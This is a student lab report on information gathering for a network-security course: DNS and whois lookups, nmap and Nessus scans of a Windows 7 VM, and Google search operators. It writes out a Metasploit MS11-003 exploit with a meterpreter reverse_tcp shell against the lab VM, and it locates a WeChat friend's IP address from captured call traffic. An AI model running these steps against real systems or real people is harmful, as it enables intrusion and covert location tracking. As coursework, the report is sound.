20232325 2025-2026-1 《网络与系统攻防技术》实验五实验报告

news/2025/11/16 21:28:23/文章来源:https://www.cnblogs.com/DDD643/p/19229102

网络攻防信息搜集技术实验报告

1.实验内容

  • 1.1域名与IP信息搜集分析;
  • 1.2社交网络IP地址获取与地理位置定位;
  • 1.3靶机环境扫描探测、漏洞评估与攻击路径分析;
  • 1.4搜索个人网上足迹与高级搜索技能实践。

2.实验目的

学习如何综合使用各种工具(如搜索引擎、扫描引擎、扫描工具)对目标进行分析与了解。锻炼网络攻防中不可或缺的信息搜集技术

3.实验环境

安装Kali镜像以及安装Win7镜像的2台VMware虚拟机,一台win11的笔记本电脑
image
image

4.实验过程与分析

4.1 对baidu.com进行DNS域名查询,获取信息

4.1.1 查询DNS注册人及联系方式

在kali的终端中whois baidu.com,查询该域名的注册信息。
image
image

从返回数据中可以了解到:

  • 注册人组织:北京百度网讯科技有限公司
  • 注册人国家:中国
  • 注册域名ID:11181110_DOMAIN_COM-VRSN
  • 注册商:MarkMonitor Information Technology (Shanghai) Co., Ltd.
  • 注册商IANA ID:3838
  • 注册机构:MarkMonitor Inc.
  • 注册商滥用投诉电话:+1.2083895740
  • 注册商滥用投诉邮箱:abusecomplaints@markmonitor.com

4.1.2查询对应域名的IP地址

使用命令dig baidu.com查询DNS解析信息。由图可知,124.237.177.164和110.242.74.102是百度的两个IP地址。且为实现负载均衡,百度配置了多个地址记录,使得用户访问时会分配到不同的服务器IP。
image

使用命令nslookup baidu.com查询域名的DNS信息,对上述信息进行验证。在本地DNS服务器的缓存解析到了124.237.177.164和110.242.74.102两个IP地址,查询AI得知这说明百度使用了多IP负载均衡策略。
image

4.1.3查询IP地址注册信息

使用whois查询124.237.177.164
image

  • IP段:182.61.0.0-182.61.255.255
  • 所属机构:北京百度网讯科技有限公司(Beijing Baidu Netcom Science and Technology Co., Ltd.)
  • 地理位置:中国北京市海淀区上地十街10号百度大厦,邮编100080
  • Abuse联系方式:huxin05@baidu.com
  • 最后修改时间:2024-03-11T23:29:48Z
  • 管理机构:亚太互联网络信息中心(APNIC)
  • 地址:北京市中关村理想大厦12f
  • 联系方式:邮箱huxin05@baidu.com(同时为滥用投诉邮箱)
  • 管理与技术联系人:ZKY3-AP
  • 最后修改时间:2025-10-28T02:23:06Z
  • 来源:亚太互联网络信息中心(APNIC)

4.1.4跟踪网络路由

在kali的终端中输入traceroute baidu.com,追踪到数据包从本机到目标主机所经过的路径。但是全是*,询问AI可能是中间路由设备禁用了ICMP/UDP响应,导致无法追踪跳转路径。
image

使用TCP追踪traceroute -T baidu.com

  • 第1跳:192.168.57.2(192.168.57.2) 0.295ms 0.208ms
    跳数1;节点IP 192.168.57.2(本地网络的网关);延迟0.295ms和0.208ms;最后的表示某一次请求未收到响应(但前两次成功了,所以网关是通的)。
  • 第2跳:110.242.74.102(110.242.74.102) 15.134ms
    跳数2;直接到达目标IP 110.242.74.102(百度的服务器节点);延迟15.134ms;同样是某一次请求未收到响应,但有一次成功响应,说明已到达目标。
    image

tracert baidu.com
可以看出百度出于安全策略禁用 ICMP 回显功能,导致中间节点不返回响应,从而显示 “请求超时”。
image

4.1.5获取IP地址注册位置

使用“UU在线工具”查询IP地址的具体位置,网址为:https://uutool.cn/ip/。对于110.242.74.102,它们的详细信息如图所示。发现地址为河北保定
image

4.2尝试获取一位好友的IP地址与具体地理位置

4.2.1获取IP地址

在Win主机上终端中输入ipconfig得知主机ip为192.168.3.12,如图所示。
image

给微信好友打语音电话,使用wireshark抓包,使用命令udp and ip.addr==192.168.3.12筛选IP为Win主机地址,并且传输协议为UDP的数据包。筛选结果如图所示。
image

可以看出主要是60.29.224.172。使用https://uutool.cn/ip/可以看到微信好友的ip详细信息在中国天津
image

4.3使用nmap开源软件对靶机环境进行扫描

我选择windows7虚拟机作为靶机,在终端中输入ipconfig,得知IP地址为192.168.57.145
image

kali虚拟机的终端中输入ifconfig,得知kali的IP地址为192.168.57.133
![image]image

4.3.1检查靶机IP地址是否活跃

kali虚拟机的终端中输入命令nmap -sn 192.168.57.145对win7虚拟机进行ping扫描,由图可见反馈Host is up,说明该靶机IP地址处于运行状态,网络可达。
image

kali虚拟机的终端中输入命令nmap -sS 192.168.57.145进行SYN扫描,查询靶机开放的TCP端口。开放的端口有135、139、445。其中135提供RPC服务,139提供NetBIOS会话服务,445端口提供Microsoft目录服务。
image

kali虚拟机的终端中输入nmap -sU 192.168.57.145对靶机进行UDP扫描,查询靶机开放的UDP端口。靶机开放的UDP端口有123、137、138、500、1900、4500、5355端口。123提供ntp服务。137端口是NetBIOS名称服务
image

4.3.3靶机安装的操作系统及版本

kali虚拟机的终端中输入命令nmap -O 192.168.57.145,查询靶机安装的操作系统及版本。该扫描结果显示,系统版本是Microsoft Windows 7 SP0-SP1。与实际情况一致
image

4.3.4靶机安装的服务

通过输入命令nmap -sV 192.168.57.145,查询靶机安装的服务。

  • 135/tcp:支持进程间通信及远程管理
  • 139/tcp:局域网共享资源连接服务
  • 445/tcp:文件与打印机共享服务
    image

4.4用Nessus开源软件对靶机环境进行扫描

4.4.1下载Nessus

在Kali虚拟机上下载nessus,下载的方式是通过如下网址:https://blog.csdn.net/m0_68472908/article/details/137255414
安装完成后,通过https://localhost:8834打开nessus,选择create new scan->host discovery。
输入任务名称、描述、文件夹与目标主机ip。
image

开放的端口有135,139,445,49152,49153,49154,49155,49156,49158
image

4.4.4靶机各个端口上网络服务存在哪些安全漏洞

重新新建一个扫描,选择New scan->Advanced Scan。输入任务名称、描述、文件夹与目标主机ip。
image

扫描情况如图可见
image
image

对扫描得情况分析如下:

  • 严重漏洞:
    • MS11-030:Windows DNS客户端处理链路本地多播名称解析(LLMNR)查询存在缺陷,攻击者可利用该漏洞以Network Service账户权限远程执行任意代码,影响Windows 2008、7等版本。
    • Unsupported Windows OS:远程Windows系统因缺少服务包或不再被微软支持,大概率存在安全漏洞,面临持续的安全风险。
  • 高危漏洞:
    • MS17-010:Windows SMBv1服务存在多个远程代码执行和信息泄露漏洞,未认证攻击者可通过特制数据包远程执行任意代码或泄露敏感信息,该漏洞被“永恒之蓝”等利用,引发WannaCry等勒索软件大规模传播。

4.4.5如何攻陷靶机环境,以获得系统访问权

我们利用MS11-003的ie浏览器严重远程代码执行漏洞,该漏洞在windows7中存在。漏洞源于IE处理CSS @import规则时的逻辑缺陷,对恶意构造的样式表文件输入验证不足,导致堆栈缓冲区溢出。我们可以通过特制的HTML文件触发漏洞,进而控制受害系统。
查看有无关键补丁,搜索到修复漏洞的关键补丁是KB2482017,
打开控制面板,进入程序与功能中的已安装的更新,查看。发现Win7虚拟机中没有相关补丁的,说明可以攻击。
image

首先,启动kali数据库
运行命令:service postgresql start
运行命令:service postgresql status
image

运行命令:msfconsole命令,进入metasploit
image

然后运行命令:search ms11_003,进行查看
image

运行命令:use exploit/windows/browser/ms11_003_ie_css_import
输入show options查看需要设置的参数
image

设置生成的恶意网页的URI为baidu.com
运行命令:set URIPATH baidu.com
为防止服务器端口冲突,设置服务器端口为8989,避开常用端口8080
运行命令:set SRVPORT 8989
设置服务器地址,服务器为kali地址。
运行命令:set SRVHOST 192.168.57.133
设置攻击负载
运行命令:set PAYLOAD windows/meterpreter/reverse_tcp
查看参数设置情况。
运行命令:show options
image

设置LHOST以绑定Kali的IP地址
运行命令:set LHOST 192.168.57.133
为避免冲突设置LPORT
运行命令:set LPORT 8866
image

运行命令:exploit
开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页
在Win7靶机打开IE,
访问http://192.168.57.133:8989/baidu.com模拟受害者误点击网页.
image

出现如图绿色successfully,表示已成功注入
image

运行命令:sessions列出所有会话,验证攻击是否成功。
image

任意进入一个回话,查看攻击者的身份,输入命令sessions 6
输入shell进入CMD.
发现输出有明显乱码,因此输入Chcp 65001解决系统编码格式不一致导致的乱码。
image

输入screenshot对Win7虚拟机进行截图。
image

Win7虚拟机截图如下
image

4.5搜索测试

4.5.1通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。

搜索自己的名字,发现网上有很多信息,但是都不是我,全是重名的人
image

搜索自己的学号,发现有博客园中的博客,没有其他信息。
image

搜索自己的手机号,没有发现有关于我的敏感信息,但能够判断出我手机号注册的位置。
image

搜索自己的身份证号,没有任何敏感信息,但可以分析出我的出生地。
image

总的来说,我的信息没有泄露到互联网。

4.5.2练习使用Googlehack搜集技能完成搜索

(1)site:指定域名
用于搜索指定网站或域名的资源
site:baidu.com 黑客
image

(2)inurl:URL中包含指定关键词
常用于寻找后台、敏感路径。
inurl:admin
image

(3)info:指定域名
查询网站的基础信息。
info:baidu.com
image

(4)intext:限定关键字
限定关键字必须出现在网页正文内容中。
intext:黑客
image

(5)intitle:匹配关键字
只匹配网页标题中含关键字的页面。
intitle:树莓派
image

(5)allintitle:查找标题中同时包含多个关键词的页面
比intitle:更严格,要求网页标题中必须同时出现所有指定的关键字。
allintitle:树莓派
image

(7)filetype:匹配文件类型
限定搜索指定文件格式的资源。
filetype:pdf 树莓派
image

(8)related:搜索相似网站
功能:寻找与目标网站内容或功能相似的其他网站,用于扩展信息搜集范围。
related:Github.com
image

(9)ext:限定搜索特定类型的网页扩展名
与filetype:作用类似,但它侧重于URL中显示的文件扩展名。
image

(10)*通配符
image

5.问题及解决

问题一:下载安装Nessus的过程中,在编译插件时显示Nessus没有插件。因此,功能有限,无法编译更无法使用

image

解决一:先关闭nessus服务,然后更新插件最后开启nessus服务,反复几次之后再通过Kali的浏览器中查看,终于可以运行

问题二:使用traceroute -T baidu.com时,无法正常获得所需的信息,提醒我为不允许的操作

image

解决二:使用管理员权限之后可以正常运行,获得了所需信息。

6.心得体会

本次实验的主要内容是信息搜集技术,我学习了如何综合使用各种工具(如搜索引擎、扫描引擎、扫描工具)对目标进行分析与了解,通过一系列的尝试与练习,我对信息搜集技术有了进一步的认识,技术水平也有了一定的进步。

本次实验的整体难度并不高,但也遇到了不少问题。比如选择靶机镜像,之前想尝试用网络安全协议课程中的win2016,但是发现扫描端口极其慢,只能再安装win7虚拟机才能顺利完成实验。配置nessus时由于与同学进行了交流,借鉴的是非常完备的博客,所以整体比较顺利,但是还是碰到了无法对插件进行编译的问题,查阅资料后反复编译终于成功编译。同时在Googlehack部分,我发现国内很多浏览器不支持部分比较进阶的语法,通过询问AI和与同学交流解决了这个问题。

总而言之,在本次实验中我尝试了信息搜集的基础技术,并深刻感受到了这项技术的强大与全面,也认识到了自己所掌握的只是冰山一角,要学习的还有很多。我相信通过这次实验,我对网络攻防知识与技术有了进一步的认识,信息搜集技术水平也得到了一定提升。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/967372.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

12.docker swarm - 指南

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

山东大学 计算机图形学实验 二维网格剖分 Catmull-Clark算法

原理可以参考这里 想自己写的记得注意边界条件:度数<=3的顶点不做位置调整,只和一个面相邻的边点直接取边的中点 #include <iostream> #include <fstream> #include <vector> #include <sst…

从Ubuntu安装Harbor故障到了解AppArmor 与 Seccomp的思考

Ⅰ. 冲突:级联故障下的“表象迷惑”与MTTR损失 我们从一次 Harbor 镜像仓库的启动失败开始。在修复了初期由非标准 Unicode 字符导致的 YAML 解析错误后,系统并没有如期启动,反而陷入了更深层次的循环崩溃,最终在H…

鸿蒙应用开发实战:如何从0到1打造创新应用

以「往来记」为例,揭秘创新应用的构思、设计与实现全流程💡 引言:在成熟市场中寻找创新机会 在当今应用市场趋于饱和的环境下,很多开发者都在思考:如何做出真正有创新性的应用? 通过「往来记」这个项目的完整开…

什么是“组态路径”?

什么是“组态路径”?定义: 组态路径(Configuration Path)是指多个条件变量(因素)以特定组合方式共同作用,导致某一结果变量(如高风险感知)出现的因果路径。 📌 通俗解释: 它不是看“哪个因素最重要”,而是…

2025年11月防冻液厂家推荐榜:五家对比与性能评价一览

入冬前,设备管理者、暖通工程商、冷链物流运营方乃至新能源电池厂,都在为同一件事奔忙:把系统里的“血液”换成可靠的防冻液。零下突袭的寒潮、突发的政策抽检、客户对能耗与环保的双重要求,让“选错防冻液”成为停…

深入探索剖析 JVM 的启动过程

你可曾想过:当你在终端里敲下 java,在 main 方法真正运行之前,JVM 为了“创造一个可运行你的程序的宇宙”,到底经历了哪些步骤?从参数校验、系统资源探测,到选择垃圾回收器,再到类的加载、链接与初始化,这些看…

noip8多校2

11.1511.15 t1 赛时想假2.75h,敲了10k(咋做到的?不知道) 曼哈顿距离转切比雪夫距离。 详见 直接出结论: 将每个坐标 \((x,y)\) 变作 \((x+y,x−y)\) 后,原坐标的曼哈顿距离等于新坐标的切比雪夫距离。 证明: 拆式…

2025年11月防冻液厂家推荐排行:五家实力对比与选购指南

立冬之后,北方夜间温度已逼近冰点,南方昼夜温差也迅速拉大,工业循环冷却、空气能热泵、数据中心冷却、冷链物流、冰雪场馆制冰等场景陆续进入“防冻关键期”。大量工程商、设备运维方、物业后勤和经销商开始集中备货…

2025年11月防冻液厂家推荐对比:五家资质与性能全维度排行

进入11月,华北、华东集中供暖启动,西北、东北工业循环冷却系统面临-20℃以下考验,防冻液采购高峰随之到来。用户普遍面临三大痛点:一是低温粘度升高导致泵耗上升,二是缓蚀体系不匹配造成换热器点蚀,三是环保抽查…

2025年11月防冻液厂家推荐榜:五家主流对比与选购指南

入冬前,设备管理者最怕“一夜冻裂”。北方某数据中心去年因防冻液冰点不足,板式换热器爆裂,停机六小时,直接损失超三百万元;南方食品厂用劣质载冷剂,盘管穿孔,整库货物报废。用户此刻上网搜索“防冻液厂家”,核…

2025年11月冷媒剂厂家榜单:五强技术参数与口碑对比评测

如果你正在给新建冷库、数据中心或新能源电池产线挑选冷媒剂,大概率会被三个问题困住:一是“无腐蚀”口号满天飞,却拿不出第三方检测报告;二是低温型号不少,能在零下六十度仍保持低粘度的寥寥无几;三是厂家都说自…

2025年11月载冷剂厂家推荐榜:技术资质与口碑综合评测

进入2025年第四季度,冷链、数据中心、新能源电池、冰雪运动等温控场景对载冷剂的需求持续升温。用户普遍面临“配方不透明、腐蚀风险高、低温流动性差、环保认证缺失”四大痛点,同时希望一次性锁定“资质齐全、技术迭…

一对一 WebRTC 视频聊天

“最小可运行”的一对一 WebRTC 视频聊天示例(前端+信令服务器),完全按照你给出的 8 条信令流程图实现。 技术栈:前端:原生 JavaScript + socket.io-client 信令服务器:Node.js + socket.io + Express(80 端口…

2025年11月载冷剂厂家推荐榜:五强真实数据与场景化选型指南

进入2025年冬季,北方冷库、数据中心、新能源电池产线陆续进入满负荷运行,载冷剂作为二次冷媒的“血液”,其稳定性直接决定系统能耗与设备寿命。很多工程师在招标阶段发现:同样标注“食品级”或“低电导”的产品,现…

2025年11月载冷剂厂家榜单:性能参数与口碑综合评测

进入2025年第四季度,北方集中供暖启动、冷链物流旺季叠加新能源电池扩产,载冷剂采购需求集中爆发。很多项目工程师面临“三快一严”场景:快速选型、快速比价、快速交付,同时环保与安全审查趋严。用户普遍担心三点:…

20232313 2025-2026-1 《网络与系统攻防技术》实验五实验报告 - 20232313

1.实验内容基本实验内容如下:学会使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 veil,加壳工具 使用C + shellcode编程 通过组合应…

【第7章 I/O编程与异常】Python文件操作与上下文管理器的深度解析(避坑指南)

从 C 到 Python:文件操作与上下文管理器的深度解析(避坑指南) 对于习惯了 C 语言手动管理资源的学习者,Python 的文件操作和上下文管理器常常带来认知混淆:为什么 C 必须手动 fopen/fclose,而 Python 能用 with …

2025年11月乙二醇厂家对比榜:五家主流厂商真实数据与选型要点

进入2025年第四季度,国内工业温控系统进入年度维保与新建项目并行的高峰期,乙二醇作为防冻液母液、载冷剂溶剂及工业传热介质的核心原料,采购量显著抬升。国家能源局11月最新统计显示,工业温控领域乙二醇月需求环比…

2025年11月乙二醇厂家对比榜:五强产品性能与合规资质全盘点

进入11月,北方工业循环与冷链系统陆续进入防冻液集中更换窗口,乙二醇作为载冷剂母液的需求陡增。用户普遍面临三大痛点:一是原料纯度与批次稳定性差异大,导致换热效率波动;二是资质文件繁杂,难以快速识别合规供应…